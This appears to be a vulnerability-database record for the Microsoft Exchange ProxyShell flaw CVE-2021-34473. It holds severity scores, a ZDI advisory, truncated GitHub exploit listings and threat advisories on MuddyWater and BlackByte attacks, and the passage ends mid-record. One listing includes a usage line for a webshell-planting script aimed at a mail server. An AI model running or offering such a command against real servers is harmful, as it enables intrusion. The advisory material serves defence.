Exploit for Server-Side Request Forgery in Microsoft

2022-11-16T08:22:29

Description

# CVE-2021-34473-NMAP-SCANNER A massive scanner for CVE-2021-344...

{"id": "2BEFA353-947D-5B41-AE38-EDB0C71B5B44", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "description": "# CVE-2021-34473-NMAP-SCANNER\nA massive scanner for CVE-2021-344...", "published": "2022-11-16T08:22:29", "modified": "2023-05-06T05:33:04", "epss": [{"cve": "CVE-2021-34473", "epss": 0.97322, "percentile": 0.99787, "modified": "2023-05-23"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-34473"], "immutableFields": [], "lastseen": "2023-05-23T17:18:33", "viewCount": 332, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0476"]}, {"type": "cisa", "idList": ["CISA:8C51810D4AACDCCDBF9D526B4C21660C"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-34473"]}, {"type": "cve", "idList": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "githubexploit", "idList": ["0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "4AC49DB9-A784-561B-BF92-94209310B51B", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "E458F533-4B97-51A1-897B-1AF58218F2BF", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F2305684A25C735549865536AA4254BF"]}, {"type": "ics", "idList": ["AA21-321A", "AA22-117A", "AA22-257A", "AA22-321A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C"]}, {"type": "kaspersky", "idList": ["KLA12224"]}, {"type": "krebs", "idList": ["KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433"]}, {"type": "mscve", "idList": ["MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-34473"]}, {"type": "mskb", "idList": ["KB5001779"]}, {"type": "msrc", "idList": ["MSRC:C28CD823FBB321014DB6D53A28DA0CD1"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_EXCHANGE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163895"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:77A7D085A837F9542DA633DA83F4A446"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720"]}, {"type": "securelist", "idList": ["SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "thn", "idList": ["THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:54023E40C0AA4CB15793A39F3AF102AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:FA40708E1565483D14F9A31FC019FCE1"]}, {"type": "threatpost", "idList": ["THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496"]}, {"type": "trellix", "idList": ["TRELLIX:21227249912602DD6E11D3B19898A7FF"]}, {"type": "zdi", "idList": ["ZDI-21-821"]}, {"type": "zdt", "idList": ["1337DAY-ID-36667"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "epss": [{"cve": "CVE-2021-34473", "epss": 0.97375, "percentile": 0.99825, "modified": "2023-05-01"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1685086688, "score": 1684862610, "epss": 0}, "_internal": {"score_hash": "f9c94f9483037ea3ecdf58c3c9b06aac"}, "privateArea": 1}

{"zdi": [{"lastseen": "2023-05-23T15:49:57", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Autodiscover service. The issue results from the lack of proper validation of URI prior to accessing resources. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "zdi", "title": "(Pwn2Own) Microsoft Exchange Server Autodiscover Server Side Request Forgery Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-07-19T00:00:00", "id": "ZDI-21-821", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-821/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-17T22:52:28", "description": "# CVE-2021-34473-scanner\nScanner for CVE-2021-34473, ProxyShell,...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T12:20:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-12-22T09:48:36", "id": "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-10T07:09:52", "description": "# CVE-2021-34473\nCVE-2021-34473 Microsoft Exchange Server Remote...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T11:27:13", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2022-08-10T06:53:56", "id": "4AC49DB9-A784-561B-BF92-94209310B51B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:33:27", "description": "- python send_webshell_mail.py https://mail16.echod.com aaa@echo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T07:47:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2023-09-16T21:49:11", "id": "0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:43:07", "description": "# ProxyShell_POC\nPOC for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T07:29:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34523", "CVE-2021-31207", "CVE-2021-34473"], "modified": "2022-03-12T13:42:54", "id": "E458F533-4B97-51A1-897B-1AF58218F2BF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:31:20", "description": "# Proxyshell-Scanner\nnuclei scanner for Proxyshell RCE (CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T15:01:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34423"], "modified": "2022-03-02T12:56:33", "id": "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:01:02", "description": "# ProxyShell\nProof of Concept Exploit for Microsoft Exchange CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T15:34:03", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-23T18:03:46", "id": "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:18:47", "description": "# Contains Custom NSE scripts \n\n\n# CVE-2020-0796\nNSE script to d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T17:51:29", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1350", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-34473"], "modified": "2022-03-23T17:15:09", "id": "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "hivepro": [{"lastseen": "2021-11-18T13:20:19", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.![](chrome-extension://gmpljdlgcdkljlppaekciacdmdlhfeon/images/beside-link-icon.svg)](<https://www.hivepro.com/wp-content/uploads/2021/11/MuddyWater-is-taking-advantage-of-old-vulnerabilities_TA202149.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FA-zero-day-vulnerability-has-been-discovered-in-PANs-GlobalProtect-firewall_TA202148-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom's National Cyber Security Centre (NCSC) have issued a joint advisory to warn organizations about an APT State sponsored Actor exploiting old Fortinet and proxyshell vulnerabilities. \nSince late March 2021, this APT Iranian State sponsored Actor (MuddyWater) has been breaching vulnerable networks by exploiting Fortinet vulnerabilities. The Hive Pro threat Research team has issued a detailed and in [depth](<https://www.hivepro.com/old-fortinet-vulnerabilities-exploited-by-state-sponsored-actors/>) advisory for the same. \nNow, in October 2021, MuddyWater is getting initial access to the susceptible system by exploiting the well known ProxyShell Vulnerability (CVE 2021 34473). \nIt is recommended that organizations patch these vulnerabilities as soon as available. \nThe Tactics and Techniques used by MuddyWater are: \nTA0042 - Resource Development \nT1588.001 - Obtain Capabilities: Malware \nT1588.002 - Obtain Capabilities: Tool \nTA0001 - Initial Access \nT1190 - Exploit Public Facing Application \nTA0002 - Execution \nT1053.005 - Scheduled Task/Job: Scheduled Task \nTA0003 - Persistence \nT1136.001 - Create Account: Local Account \nT1136.002 - Create Account: Domain Account \nTA0004 - Privilege Escalation \nTA0006 - Credential Access \nTA0009 - Collection \nT1560.001 - Archive Collected Data: Archive via Utility \nTA0010 - Exfiltration \nTA0040 - Impact \nT1486 - Data Encrypted for Impact\n\n#### Actor Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/11/actor-details-3-1024x257.png)\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/11/VM-3-1024x585.png)\n\n#### Indicators of Compromise (IoCs)\n\n![](https://www.hivepro.com/wp-content/uploads/2021/11/ioc-2-1024x344.png)\n\n#### Patch Link\n\n<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>\n\n<http://www.securityfocus.com/bid/108693>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-18T11:45:32", "type": "hivepro", "title": "MuddyWater is taking advantage of old vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-11-18T11:45:32", "id": "HIVEPRO:186D6EE394314F861D57F4243E31E975", "href": "https://www.hivepro.com/muddywater-is-taking-advantage-of-old-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-07T15:20:43", "description": "#### THREAT LEVEL: Red.\n\n \n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/BlackByte-ransomware-exploits-Microsoft-Servers-ProxyShell-vulnerabilities_TA202155.pdf>)\n\nBlackByte ransomware is targeting organizations with unpatched ProxyShell vulnerabilities. Proxy Shell was addressed by hive pro threat researcher in the previous [advisory](<https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/>) released on August 24.\n\nProxyShell is a combination of three flaws in Microsoft Exchange:\n\nCVE-2021-34473 Pre-auth path confusion vulnerability to bypass access control. \nCVE-2021-34523 Privilege escalation vulnerability in the Exchange PowerShell backend. \nCVE-2021-31207 Post-auth remote code execution via arbitrary file write.\n\nThese security flaws are used together by threat actors to perform unauthenticated, remote code execution on vulnerable servers. After exploiting these vulnerabilities, the threat actors then install web shells, coin miners, ransomwares or backdoors on the servers. Attackers then use this web shell to deploy cobalt strike beacon into Windows Update Agent and get the credentials for a service account on compromised servers. The actor then installs Anydesk to gain control of the system and do lateral movement in the organization network. Post exploitation, attackers carry on with using Cobalt Strike to execute the Blackbyte ransomware and encrypt the data.\n\nAffected organizations can decrypt their files using a free decryption tool written by [Trustwave](<https://github.com/SpiderLabs/BlackByteDecryptor>). Users can patch their server for ProxyShell vulnerabilities using the link down below.\n\n**Techniques used by Blackbyte ransomware are :**\n\nT1505.003 Server Software Component: Web Shell \nT1055 Process Injection \nT1059.001 Command and Scripting Interpreter: PowerShell \nT1595.002 Active Scanning: Vulnerability Scanning \nT1027 Obfuscated Files of Information \nT1490 Inhibit System Recovery \nT1112 Modify Registry \nT1562.001 Impair Defenses: Disable or Modify Tools \nT1562.004 Impair Defenses: Disable or Modify System Firewall \nT1018 Remote System Discovery \nT1016 System Network Configuration Discovery \nT1070.004 Indicator Removal on Host: File Deletion \nT1560.001 Archive Collected Data: Archive via Utility\n\n[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F12%2FMicrosoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\n \n\n#### Vulnerability Details\n\n \n\n![](https://www.hivepro.com/wp-content/uploads/2021/12/Vulnerability-detail-1024x314.png)\n\n \n\n#### Actor Detail\n\n \n\n![](https://www.hivepro.com/wp-content/uploads/2021/12/actor-detail-1024x126.png)\n\n \n\n#### Indicators of Compromise(IoCs)\n\n \n\n![](https://www.hivepro.com/wp-content/uploads/2021/12/IoC-1024x187.png)\n\n \n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n \n\n#### References\n\n<https://redcanary.com/blog/blackbyte-ransomware/>\n\n<https://www.techtarget.com/searchsecurity/news/252510334/BlackByte-ransomware-attacks-exploiting-ProxyShell-flaws>\n\n<https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackbyte-ransomware/>\n\n<https://www.stellarinfo.com/blog/blackbyte-ransomware-attacks-exchange-servers-with-proxyshell-flaws/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 